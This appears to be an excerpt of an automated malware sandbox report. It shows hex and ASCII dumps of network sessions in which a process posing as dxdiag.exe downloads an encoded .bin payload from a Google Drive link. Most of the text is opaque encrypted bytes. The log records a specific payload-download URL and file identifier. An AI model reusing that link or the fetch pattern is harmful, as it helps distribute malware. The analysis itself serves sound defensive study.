                        2024-10-01 05:46:28 UTC1321INData Raw: 4c 75 74 44 72 2f 42 54 41 66 6a 46 46 39 49 41 6f 47 37 76 48 33 63 6f 79 48 54 2f 55 65 4a 53 56 4a 75 30 76 74 76 6b 62 72 53 61 5a 53 53 61 37 4a 66 4e 4b 59 4a 77 73 70 31 43 4c 35 7a 57 58 39 36 4d 4c 6c 48 43 35 70 31 44 73 6a 78 37 73 39 37 75 4f 6a 75 36 34 63 43 66 2f 72 69 2b 6c 36 33 44 76 79 32 59 6a 4e 4a 62 52 54 44 34 62 4f 34 5a 75 4e 59 34 67 36 4d 73 45 59 79 48 43 33 63 7a 30 35 55 36 6b 66 58 66 79 63 67 74 2f 73 7a 45 62 6e 69 61 41 78 72 79 4d 35 33 47 33 30 48 6f 39 36 79 44 32 31 6d 30 37 56 36 64 56 51 43 67 6f 76 50 65 2b 71 6f 2b 70 49 71 64 4e 4e 46 33 47 79 66 39 2b 6f 50 55 62 6a 65 66 4c 39 44 78 71 58 2b 32 4f 4f 4b 35 65 63 42 2b 55 6a 4d 53 63 61 43 68 6c 47 53 32 61 72 6e 68 4f 6a 4c 67 44 46 59 38 5a 33 68 55 6f 77 61
                        Data Ascii: LutDr/BTAfjFF9IAoG7vH3coyHT/UeJSVJu0vtvkbrSaZSSa7JfNKYJwsp1CL5zWX96MLlHC5p1Dsjx7s97uOju64cCf/ri+l63Dvy2YjNJbRTD4bO4ZuNY4g6MsEYyHC3cz05U6kfXfycgt/szEbniaAxryM53G30Ho96yD21m07V6dVQCgovPe+qo+pIqdNNF3Gyf9+oPUbjefL9DxqX+2OOK5ecB+UjMScaChlGS2arnhOjLgDFY8Z3hUowa
                        2024-10-01 05:46:28 UTC1390INData Raw: 4a 7a 66 33 6a 7a 30 55 5a 62 35 31 4a 2f 2b 72 4a 34 44 72 63 65 54 42 61 66 2b 67 78 7a 32 70 59 4d 4f 38 47 6c 45 73 73 54 74 30 54 72 2f 31 4c 61 76 47 41 4e 77 47 36 48 6f 5a 41 61 54 2b 68 53 33 7a 2f 74 4e 37 41 69 51 47 75 6b 36 2f 66 64 31 50 6b 58 6b 77 36 32 41 6e 75 33 5a 48 4a 36 68 6d 53 43 61 37 64 6b 67 6d 75 33 5a 49 37 70 35 43 46 6a 4b 50 4b 68 47 32 4b 4d 48 71 55 57 67 77 63 33 62 66 67 79 53 2f 2b 7a 67 51 69 7a 49 75 54 58 51 42 63 78 43 53 6a 76 65 4b 68 77 42 33 74 61 64 4a 49 30 33 38 7a 50 65 36 6c 6c 64 36 5a 36 64 35 79 30 36 35 4c 69 62 55 72 31 74 2f 57 4c 73 2b 68 54 77 31 73 31 52 67 44 70 65 2b 63 54 37 4e 5a 4c 37 55 4b 6f 4b 63 45 33 41 44 45 4a 4f 58 65 7a 5a 77 4d 65 72 4e 35 2b 4f 41 6a 46 58 68 4a 66 50 56 30 49 71
                        Data Ascii: Jzf3jz0UZb51J/+rJ4DrceTBaf+gxz2pYMO8GlEssTt0Tr/1LavGANwG6HoZAaT+hS3z/tN7AiQGuk6/fd1PkXkw62Anu3ZHJ6hmSCa7dkgmu3ZI7p5CFjKPKhG2KMHqUWgwc3bfgyS/+zgQizIuTXQBcxCSjveKhwB3tadJI038zPe6lld6Z6d5y065LibUr1t/WLs+hTw1s1RgDpe+cT7NZL7UKoKcE3ADEJOXezZwMerN5+OAjFXhJfPV0Iq
                        2024-10-01 05:46:28 UTC1390INData Raw: 65 4c 74 36 74 6f 68 6e 78 33 75 47 4c 52 34 46 69 44 68 64 73 75 66 64 61 71 73 6a 71 2f 65 72 2b 36 54 53 77 45 50 62 50 54 2b 6b 73 74 69 6b 58 77 37 69 51 69 74 4b 4f 79 45 55 61 31 69 48 7a 4a 45 70 38 36 41 44 4b 52 75 69 46 70 61 41 59 41 65 32 44 6c 62 43 6b 37 55 37 54 49 36 56 4c 76 32 63 35 53 47 35 31 46 69 39 37 4b 4f 6f 56 36 63 38 76 49 79 64 57 36 54 50 59 4b 4f 6f 58 61 4c 4b 6b 2f 79 63 30 4b 6b 41 45 52 4d 6e 30 45 59 75 6b 61 46 50 4a 5a 72 48 73 76 69 72 75 73 74 78 48 2f 6a 47 44 37 57 51 63 51 30 4a 4e 44 79 44 44 31 6c 34 75 43 39 56 4e 39 4d 75 76 6a 4a 37 74 32 38 38 57 7a 51 34 4a 78 42 46 59 62 4b 4d 6a 33 70 2b 38 39 71 31 61 6e 56 44 67 2f 31 30 6e 33 6a 39 45 51 74 74 5a 31 4a 2f 2b 72 4c 34 44 72 63 66 58 42 66 78 71 4d 41
                        Data Ascii: eLt6tohnx3uGLR4FiDhdsufdaqsjq/er+6TSwEPbPT+kstikXw7iQitKOyEUa1iHzJEp86ADKRuiFpaAYAe2DlbCk7U7TI6VLv2c5SG51Fi97KOoV6c8vIydW6TPYKOoXaLKk/yc0KkAERMn0EYukaFPJZrHsvirustxH/jGD7WQcQ0JNDyDD1l4uC9VN9MuvjJ7t288WzQ4JxBFYbKMj3p+89q1anVDg/10n3j9EQttZ1J/+rL4DrcfXBfxqMA
                        2024-10-01 05:46:28 UTC1390INData Raw: 58 32 74 75 30 44 71 5a 62 6d 70 42 50 73 6e 52 54 35 66 78 6c 6a 71 78 41 74 64 2f 49 42 71 36 4d 70 52 42 48 43 5a 4f 6b 46 6d 6c 62 2f 59 42 45 45 73 58 4c 43 56 43 56 4c 31 35 78 43 47 48 42 77 67 36 76 68 70 53 33 72 4e 4e 58 34 53 76 6e 48 4d 33 58 73 46 69 4a 7a 35 5a 2f 36 6d 35 46 4d 38 75 30 48 35 33 45 6b 42 4d 73 55 57 30 35 4d 78 63 62 54 6d 59 68 4a 6b 6d 32 71 76 49 33 76 2f 75 30 37 53 66 34 66 72 72 7a 47 35 53 6a 34 6b 34 65 69 6b 6b 4a 76 75 65 4b 4d 76 48 77 39 45 6a 35 6d 74 59 49 34 4a 66 47 48 43 33 45 63 36 6e 67 4c 6b 50 71 52 70 54 58 41 49 69 75 35 39 50 49 37 74 32 47 4a 35 71 31 4b 42 47 6a 72 42 58 66 34 68 62 58 35 6f 4b 4a 52 2b 36 4d 70 46 4a 49 53 59 51 63 66 6e 49 65 69 63 7a 39 56 56 55 2b 51 66 4c 6e 57 4b 53 68 56 35
                        Data Ascii: X2tu0DqZbmpBPsnRT5fxljqxAtd/IBq6MpRBHCZOkFmlb/YBEEsXLCVCVL15xCGHBwg6vhpS3rNNX4SvnHM3XsFiJz5Z/6m5FM8u0H53EkBMsUW05MxcbTmYhJkm2qvI3v/u07Sf4frrzG5Sj4k4eikkJvueKMvHw9Ej5mtYI4JfGHC3Ec6ngLkPqRpTXAIiu59PI7t2GJ5q1KBGjrBXf4hbX5oKJR+6MpFJISYQcfnIeicz9VVU+QfLnWKShV5
                        2024-10-01 05:46:28 UTC1390INData Raw: 2f 36 49 56 4e 42 37 68 7a 74 52 38 6a 34 4e 7a 5a 64 59 33 7a 35 37 4e 54 39 6f 70 54 4e 44 4b 32 32 43 75 62 4f 37 62 52 33 6a 43 75 37 64 6b 67 6d 75 33 5a 49 4a 72 75 47 72 7a 62 35 67 37 77 70 35 41 56 79 6d 55 63 62 46 53 79 2b 77 73 6e 50 2b 4c 6a 78 6c 4c 52 33 75 46 32 37 64 6b 67 6d 75 33 5a 49 4a 72 75 77 78 44 6e 75 6e 55 59 2f 36 69 35 59 58 4d 6b 43 76 79 72 7a 57 35 69 41 74 45 6c 63 44 4d 44 74 46 47 7a 71 75 74 64 57 6e 5a 48 79 32 34 38 57 53 45 39 30 30 37 43 2b 61 34 6a 6b 59 79 70 36 67 71 30 32 65 55 6f 6d 75 2f 2f 46 61 37 6c 32 53 4a 38 77 39 47 51 64 64 34 4f 48 32 69 38 46 45 72 5a 4d 64 2b 66 6e 4e 34 42 6e 5a 57 6d 69 72 4a 2f 2f 6d 4d 71 68 4f 70 2f 65 39 66 63 78 79 64 66 2f 63 4b 4f 67 4f 6f 63 47 63 58 44 38 47 58 51 42 34
                        Data Ascii: /6IVNB7hztR8j4NzZdY3z57NT9opTNDK22CubO7bR3jCu7dkgmu3ZIJruGrzb5g7wp5AVymUcbFSy+wsnP+LjxlLR3uF27dkgmu3ZIJruwxDnunUY/6i5YXMkCvyrzW5iAtElcDMDtFGzqutdWnZHy248WSE9007C+a4jkYyp6gq02eUomu//Fa7l2SJ8w9GQdd4OH2i8FErZMd+fnN4BnZWmirJ//mMqhOp/e9fcxydf/cKOgOocGcXD8GXQB4
                        2024-10-01 05:46:28 UTC1390INData Raw: 54 58 35 31 73 35 6a 72 6b 48 77 55 63 38 6a 68 4a 50 4b 63 77 79 7a 51 70 31 48 51 50 65 56 4c 39 37 6f 47 6f 35 39 79 70 30 6d 4d 63 79 4f 73 39 37 72 6f 6d 67 33 43 64 79 66 2f 71 53 2b 71 36 33 44 39 78 58 79 67 32 38 6f 49 45 71 35 6e 50 32 31 59 63 72 44 59 4d 30 75 48 55 44 39 35 6d 44 31 4c 46 41 69 4a 47 4f 6d 4a 39 52 61 74 4f 65 36 4e 68 67 30 32 36 6a 2b 6d 45 52 70 47 4c 4d 6e 50 66 58 4a 43 56 75 72 39 78 66 2b 36 64 6b 68 30 41 59 67 31 2f 47 4c 33 75 6e 49 72 78 33 79 6e 53 51 59 4e 54 56 62 2f 53 69 35 54 73 45 56 53 38 36 65 6c 68 51 73 64 73 49 34 43 6d 67 61 44 41 75 72 70 66 44 4c 4c 2f 53 65 37 64 76 63 2b 6c 46 68 52 70 33 7a 30 34 4c 53 2f 39 37 39 74 37 37 48 63 70 33 78 5a 4e 4e 37 4e 49 63 4f 62 44 6e 64 49 4a 74 4d 39 4a 50 69
                        Data Ascii: TX51s5jrkHwUc8jhJPKcwyzQp1HQPeVL97oGo59yp0mMcyOs97romg3Cdyf/qS+q63D9xXyg28oIEq5nP21YcrDYM0uHUD95mD1LFAiJGOmJ9RatOe6Nhg026j+mERpGLMnPfXJCVur9xf+6dkh0AYg1/GL3unIrx3ynSQYNTVb/Si5TsEVS86elhQsdsI4CmgaDAurpfDLL/Se7dvc+lFhRp3z04LS/979t77Hcp3xZNN7NIcObDndIJtM9JPi
                        2024-10-01 05:46:28 UTC1390INData Raw: 69 4e 79 4d 47 62 51 48 64 49 4a 6a 4b 78 48 36 30 47 6a 55 6b 6d 75 35 34 63 56 4c 39 32 47 35 33 44 43 57 30 55 4f 70 32 35 55 39 61 50 79 65 58 6c 49 2b 32 5a 4f 70 32 74 65 2b 61 4f 48 37 6f 79 6b 55 45 35 4a 76 4b 4c 56 61 31 32 50 7a 6b 4a 65 4d 6c 74 55 75 34 6d 33 57 47 62 79 77 78 41 78 55 36 34 61 54 6c 6f 55 74 78 2f 36 4c 78 4a 2b 4e 72 43 58 56 41 32 67 35 30 75 4b 75 43 6a 37 59 39 70 73 65 71 65 6f 5a 56 43 56 42 35 56 4b 58 48 2b 34 43 66 78 33 66 37 4f 55 36 64 4b 42 77 5a 58 31 66 65 68 72 4c 47 2f 50 58 51 6e 2f 36 6f 76 73 65 73 75 48 33 4d 50 54 68 63 32 4c 71 2f 62 47 6c 54 43 7a 67 65 35 75 49 44 57 30 54 47 37 52 44 6d 47 32 76 34 33 39 56 37 43 78 44 4d 66 59 53 7a 4d 32 65 49 51 52 2b 47 4c 64 6b 67 6d 75 33 5a 49 4a 72 74 32 74
                        Data Ascii: iNyMGbQHdIJjKxH60GjUkmu54cVL92G53DCW0UOp25U9aPyeXlI+2ZOp2te+aOH7oykUE5JvKLVa12PzkJeMltUu4m3WGbywxAxU64aTloUtx/6LxJ+NrCXVA2g50uKuCj7Y9pseqeoZVCVB5VKXH+4Cfx3f7OU6dKBwZX1fehrLG/PXQn/6ovsesuH3MPThc2Lq/bGlTCzge5uIDW0TG7RDmG2v439V7CxDMfYSzM2eIQR+GLdkgmu3ZIJrt2t


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.549713142.250.184.2384432072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        2024-10-01 05:46:57 UTC216OUTGET /uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.google.com
                        Cache-Control: no-cache
                        2024-10-01 05:46:57 UTC1610INHTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Tue, 01 Oct 2024 05:46:57 GMT
                        Location: https://drive.usercontent.google.com/download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download
                        Strict-Transport-Security: max-age=31536000
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Content-Security-Policy: script-src 'nonce-3LK2W62laBpdayf49mMN_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Cross-Origin-Opener-Policy: same-origin
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.549714142.250.184.1934432072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        2024-10-01 05:46:58 UTC258OUTGET /download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Cache-Control: no-cache
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-10-01 05:47:00 UTC4867INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="GUejPyvuYOfIqzabdUbw190.bin"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 106560
                        Last-Modified: Mon, 30 Sep 2024 07:11:44 GMT
                        X-GUploader-UploadID: AD-8ljumxkouoh8aPbuPtjaerRrS2jzpm4cjGOdMj93XJt8nJe8YooWcg1-BRdU56N7LnVOYyRAHLuUbOw
                        Date: Tue, 01 Oct 2024 05:47:00 GMT
                        Expires: Tue, 01 Oct 2024 05:47:00 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=6yan6A==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close
                        2024-10-01 05:47:00 UTC4867INData Raw: 7d 7f 9f f2 75 11 f5 f7 6d eb b1 da 5a 20 01 b5 0c d5 9d 20 49 2c 3f 11 e9 0b 63 db e7 25 d6 04 53 6c 41 7d 30 23 58 ed 0f 24 ef a0 89 94 db b6 91 d5 8c 3b 8f 37 55 13 14 eb bc 5d 78 7e cc ef 49 6b 09 d3 24 06 8c 2d 49 d4 78 91 01 80 84 58 6e e8 a7 27 b0 13 72 0d 73 48 fb 3e 93 33 df ca d6 2b 86 dc 0b 84 5e f2 b1 29 2d 6a 8d d4 0d 4b ff 27 8a 1d ec e7 06 20 73 3f 61 0e 95 0c a3 27 7d 5b e7 e3 0c bc 7b b3 4e b1 a5 5b 8c c9 c9 25 fd a9 50 60 3d 62 6a 30 59 66 3a 96 c8 52 c3 d7 20 45 ec eb c4 eb 97 5f ed 1e 43 f6 04 19 06 98 25 e5 07 92 75 0e 5b b4 63 ff 5f 91 b1 ce 50 08 86 2d cd ba de 13 b0 a5 dc 40 29 ec 97 68 e8 ff 25 9c d8 74 d9 58 15 fe 80 f9 2e 6e 15 94 fb 49 17 23 54 c2 61 5b d8 1f 2e f4 6d 25 84 16 34 8c aa 9a ef f1 3d 00 25 63 35 4b ee 2c 24 9b 37
                        Data Ascii: }umZ I,?c%SlA}0#X$;7U]x~Ik$-IxXn'rsH>3+^)-jK' s?a'}[{N[%P`=bj0Yf:R E_C%u[c_P-@)h%tX.nI#Ta[.m%4=%c5K,$7
                        2024-10-01 05:47:00 UTC4867INData Raw: eb d2 d9 1a a5 97 da 05 c2 3a 40 47 16 5e 81 2c f9 0a ec 2c c0 ca d9 a8 80 80 e3 2b 93 2e 43 1a c6 9c 67 16 aa ad 77 e4 4a 03 1c db 34 8f 87 54 19 a5 54 0e c1 fa a4 5e 38 b0 0f a0 68 9f 6c eb 02 ac 89 3c 5e 43 e9 3c 70 94 32 39 a8 24 cc 0f 59 fc e0 be 01 dd 8c cc 1e cb d7 ad db 63 30 39 19 c9 f2 e2 bd 5e 05 f3 33 ae 25 68 e8 45 c8 78 14 23 8a ec 97 22 68 f3 e0 ef 79 47 a5 57 a2 96 d8 27 d9 df d0 15 5a 25 2f ea ba af a1 35 62 c8 19 da 7e 99 50 bf 45 e6 83 93 fc 76 f3 e5 b6 82 43 ff c7 59 40 8f 60 17 e3 9c ea 37 8f 76 9e 54 62 57 7d a3 da 8f 84 fb fa 57 1c 86 dd 4e 4c 05 ee 24 31 b2 42 ea d9 a8 22 ba 00 e7 04 b2 82 c5 f4 67 69 34 ca 83 79 98 96 72 66 7a 4a 58 3c a1 99 5a 41 56 e7 af d3 54 69 c7 91 3e bd d1 d0 26 2e f7 6a 7b b3 0c 59 03 bc f0 52 f8 eb 43 28
                        Data Ascii: :@G^,,+.CgwJ4TT^8hl<^C<p29$Yc09^3%hEx#"hyGW'Z%/5b~PEvCY@`7vTbW}WNL$1B"gi4yrfzJX<ZAVTi>&.j{YRC(
                        2024-10-01 05:47:00 UTC99INData Raw: cc 4b 11 27 4d 3e 19 39 d4 ef b9 7b 47 a7 73 79 ce 47 06 7a 90 9b c8 82 ed 2a ba dc b6 4d 5b dc 2e 59 e6 77 df aa d7 ad c2 19 91 af c4 40 1e ca 9c 4e 3a 81 53 08 6b b9 01 b2 52 57 d8 55 60 be 9a ec 06 fb dc 6e 9a a7 75 39 97 93 76 ba 20 f8 44 74 db 39 79 13 19 ad 53 52 a0 69 52 d1 50 66 0c 63 71
                        Data Ascii: K'M>9{GsyGz*M[.Yw@N:SkRWU`nu9v Dt9ySRiRPfcq
                        2024-10-01 05:47:00 UTC1321INData Raw: 96 12 d9 21 80 48 ac 32 b1 e3 74 fd 96 cc 6c 1e 83 82 ec 1c 67 aa 0c ae b9 2e a4 e3 81 e7 89 cc 0b 3c 63 ea 68 fb f0 a4 2e 03 78 40 4a 87 bf 52 66 8e 01 10 9a 48 e1 23 76 e0 9b 2d a7 5a e0 9e c2 dd 6f d1 73 c9 15 a8 58 90 b6 09 3f 7e d1 2d e9 54 3f a0 3f dc 72 60 59 80 2d b8 d4 b4 ca 58 76 84 eb 2b e7 eb ae fe 29 15 3c 83 71 c2 18 73 51 0c bc 54 c0 d0 28 b6 df 2f 97 e7 6c f3 5f f2 ae f5 71 e1 d0 f4 1a 28 65 c7 56 c8 6f 02 31 ba 02 f1 eb c5 55 6a ab 89 17 65 ae d6 ec fc c5 df 68 07 97 e3 3e 55 63 75 b6 8b 56 ba 54 36 a1 24 7f 11 cc 44 fe 59 bf 2d a2 d3 bb 29 20 19 a2 01 e0 86 96 8b ed ac a5 0c c4 47 e8 17 8f 8c b8 04 a8 e4 14 5e 14 5a 10 bb ad 72 ea 16 1b f3 16 23 51 55 15 fb 84 cf a3 3a f6 13 bc a5 c1 24 55 67 74 d6 d8 dc 29 81 91 e0 db a9 06 87 05 e9 7b
                        Data Ascii: !H2tlg.<ch.x@JRfH#v-ZosX?~-T??r`Y-Xv+)<qsQT(/l_q(eVo1Ujeh>UcuVT6$DY-) G^Zr#QU:$Ugt){
                        2024-10-01 05:47:00 UTC1390INData Raw: fb 60 9f 8a bd 84 d4 15 6e fa a3 ef f1 28 df e3 d1 fd 2a a9 20 c5 f1 cd b3 f3 40 88 40 94 8f 1d 67 d4 7a 1b b6 79 54 16 dd 41 74 e5 bb b9 ea a4 9f 3c 2b 14 11 0d 77 07 eb 4d 1d e6 0e 8f e8 8a 51 04 11 19 b3 a3 4f ae 94 01 35 2e ad 87 c2 55 f6 7d 4c 2a 6e 20 da 18 8e 34 97 5e 5c f4 09 e3 03 7f 6e d3 fc d0 5b 93 ef f4 3f a2 68 13 17 d0 e0 11 6d 0e 1e 84 23 1c e5 c6 2a 57 49 12 d3 f9 a8 fd b1 ed 79 20 9e 6f 86 18 6d 86 b1 9e 8e ac df cd 36 86 d3 65 0d 36 80 33 4e 9f fa 33 67 82 68 07 63 2f 93 40 0c f6 4b a1 6b b1 bf d0 28 71 1e 65 bc 1d be 10 43 e8 8e 33 2a 07 de b9 67 08 59 bf e8 fd 26 19 47 c9 d8 d5 fb 84 41 2e 7c 6f 21 8b cc 1f b8 74 b8 1e d6 0e 1f 12 ca 0b fa 22 47 58 b2 26 ba da a0 38 ae e9 fa 45 49 7c 96 c7 75 d2 02 20 8d 30 72 02 f1 fa df 43 8b bc d3
                        Data Ascii: `n(* @@gzyTAt<+wMQO5.U}L*n 4^\n[?hm#*WIy om6e63N3ghc/@Kk(qeC3*gY&GA.|o!t"GX&8EI|u 0rC
                        2024-10-01 05:47:01 UTC1390INData Raw: 5a 0f 0a 01 6d 4e 61 2b 3e 1d e1 b3 25 bc 39 03 76 4a 41 c6 87 e8 78 b8 2f 1f d7 12 30 70 ee 7d b4 62 23 3e 94 61 99 a5 e9 fe 87 37 dd 96 ba c8 6f dc 3c a2 7f be e9 76 d5 08 24 95 be b9 f1 25 b6 e6 cc 7e cc 56 e7 59 f6 e9 e6 59 e8 3f bd 17 6c 50 dd e5 46 56 39 47 af a2 7e f2 39 85 84 f5 66 5a bb 77 64 0f 45 c1 f6 4d 5a 47 f6 36 49 66 4c 5c f0 ac 76 11 d9 d9 21 ad ab 35 6a 24 95 62 26 47 ef 10 c2 98 94 36 30 f7 05 4f 07 e7 76 f6 42 7a c0 7f 73 f9 db 30 56 34 ed 7e eb e0 07 b7 82 f3 82 b8 b3 7a 3b f7 d8 c3 6c f9 0f 1a 64 87 49 7f d4 3a cb 55 f6 62 c0 be bd f3 48 d5 61 31 0f b9 00 c8 c8 81 34 66 05 2a 78 f7 42 6d 6d c4 78 1b 91 cb 28 6b 04 96 be 54 34 6b f7 50 57 31 b0 f3 93 9c 26 28 a0 a6 f1 db 4c be ef 32 fb 57 62 f1 39 8b f2 58 7e a5 fd 8c 6e 01 f2 09 e8
                        Data Ascii: ZmNa+>%9vJAx/0p}b#>a7o<v$%~VYY?lPFV9G~9fZwdEMZG6IfL\v!5j$b&G60OvBzs0V4~z;ldI:UbHa14f*xBmmx(kT4kPW1&(L2Wb9X~n
                        2024-10-01 05:47:01 UTC1390INData Raw: ff 90 e4 a0 54 73 b1 89 de e3 fa fa 04 63 ca 73 5b 6b 9b 09 ec bc 1d eb ed 12 96 33 ca 48 c5 72 f3 8f 22 0b c8 af c0 65 dd ea d7 e8 77 43 f3 1c 5c 5d 17 70 ac ad 28 bc aa 95 2b 0b e3 ae 56 e6 d8 54 d3 6b ea 6e e2 36 9b 8a 32 1f ae 76 73 41 a3 23 71 3e 89 e7 f8 c5 0c 0f 45 3b 51 23 63 f3 66 36 d4 12 6d e2 e6 a9 6c 6f 38 69 eb c3 88 04 e7 58 51 32 38 50 ee 85 64 ff 0a eb 31 f7 ea 2e c6 46 00 23 86 a9 b2 24 80 a3 79 12 7b 11 41 fc f3 69 ad a0 72 8e f8 76 d9 31 2b ea 39 e8 73 96 f3 1e 51 34 7c 4c c7 8e e3 3d 99 df 48 9c 82 c2 08 9b cf fc d0 2c ea 54 af 7a cf 38 c2 bc db 38 ae 50 bf f1 2d df f9 a7 86 7b 0d 57 47 d5 ae 89 97 d2 cf 37 ec 2a c2 5f 82 ed 33 c7 2b a8 69 af 7e ac 34 ba f7 a2 cc 51 11 4a 81 dc b0 d3 e3 bb f2 d3 95 bf 3f eb 0a ca e2 43 f4 bf 23 3d 67
                        Data Ascii: Tscs[k3Hr"ewC\]p(+VTkn62vsA#q>E;Q#cf6mlo8iXQ28Pd1.F#$y{Airv1+9sQ4|L=H,Tz88P-{WG7*_3+i~4QJ?C#=g
                        2024-10-01 05:47:01 UTC1390INData Raw: 8e a8 13 35 4a 0d 4f 53 71 5c ba 64 a3 41 54 1d 85 1f e7 49 58 3e f6 76 31 68 e4 24 73 b9 c9 81 1a 1b f5 a6 15 46 d9 f1 b7 e9 fd f5 b4 03 be f3 80 ed 51 dd bb 82 cb f8 66 77 fe e7 ee b7 cf 4e 97 60 76 25 81 0a 93 b1 66 b7 be 8f a5 64 e4 3a 9c 2f 7f 17 c3 3f 56 b6 ef 2d df 97 12 c0 b8 69 65 79 c5 58 c3 cb 65 56 f4 58 30 75 2f 55 89 f7 7f e2 29 0d 9d 4a 1a 80 5d 4f 29 cb ae 23 9a a1 84 6c a1 43 aa 0b 0c 01 c6 ec 6c e0 25 77 30 f8 f7 58 0e 2d 4c ec 2e e3 49 85 75 29 fa 0c 07 d7 69 2b 57 bf 1a 0c 6c 6e 35 4b aa 0f ce d8 08 cd c8 6d 37 a4 4d 1e 06 41 34 fa ab ac e1 51 c0 36 ac 2c 46 c6 0c 50 de 82 a2 60 85 dc 3d 86 4a 20 a1 f9 6e d1 79 1c c7 21 e9 42 51 ff 5c 3b 92 06 0a 4b ff 15 43 45 21 b4 b5 2f a7 03 2f 5f de e7 97 91 5f 9d a2 57 5f 55 42 23 dc 93 aa 16 21
                        Data Ascii: 5JOSq\dATIX>v1h$sFQfwN`v%fd:/?V-ieyXeVX0u/U)J]O)#lCl%w0X-L.Iu)i+Wln5Km7MA4Q6,FP`=J ny!BQ\;KCE!//__W_UB#!
                        2024-10-01 05:47:01 UTC1390INData Raw: 1c 45 53 0c 01 8e 5b 12 d2 74 7c 4d a7 5c 7d 3d a8 52 eb 03 c5 9d 81 1d 4c f4 6c 0f 37 99 86 fd ba 8e ac d9 58 97 52 62 10 05 32 80 9b f5 3a 58 9c 67 ad 68 07 62 21 21 40 f8 01 b4 f4 68 a6 90 2f 54 f3 81 95 bc c1 3c 56 3d 9c b6 c3 c1 9a 8d a9 30 b6 bf 86 1b 02 5a 22 3e b8 62 54 82 12 dd 3c 70 e5 ca 8b cc f3 af 79 4a b1 c1 c8 24 f1 be 32 64 dd 50 04 90 31 2c a7 9b d3 08 e9 d2 b7 eb 08 8c c9 5e 9e 57 33 f1 85 16 41 7e a7 d3 7f dc 81 2b 90 4a 5a ab c9 fa 7d 6d 1f ca ba e7 bf ac 20 82 96 d7 53 8e d2 f4 da e4 32 c5 48 db 3c 00 65 75 1d 5e 16 37 7d 55 b4 e0 07 96 8e 13 01 df e1 d9 82 91 93 1e 98 a4 b0 84 b6 c7 39 e9 7a 74 63 0c 06 9f 02 6a 02 d5 79 fb 97 75 f5 09 f2 18 47 46 f8 94 e6 48 4c eb 29 b0 23 2b 78 5d d3 7f 67 26 7d 6d 2c 58 0d 3a 6d f8 40 e2 b3 59 e0
                        Data Ascii: ES[t|M\}=RLl7XRb2:Xghb!!@h/T<V=0Z">bT<pyJ$2dP1,^W3A~+JZ}m S2H<eu^7}U9ztcjyuGFHL)#+x]g&}m,X:m@Y
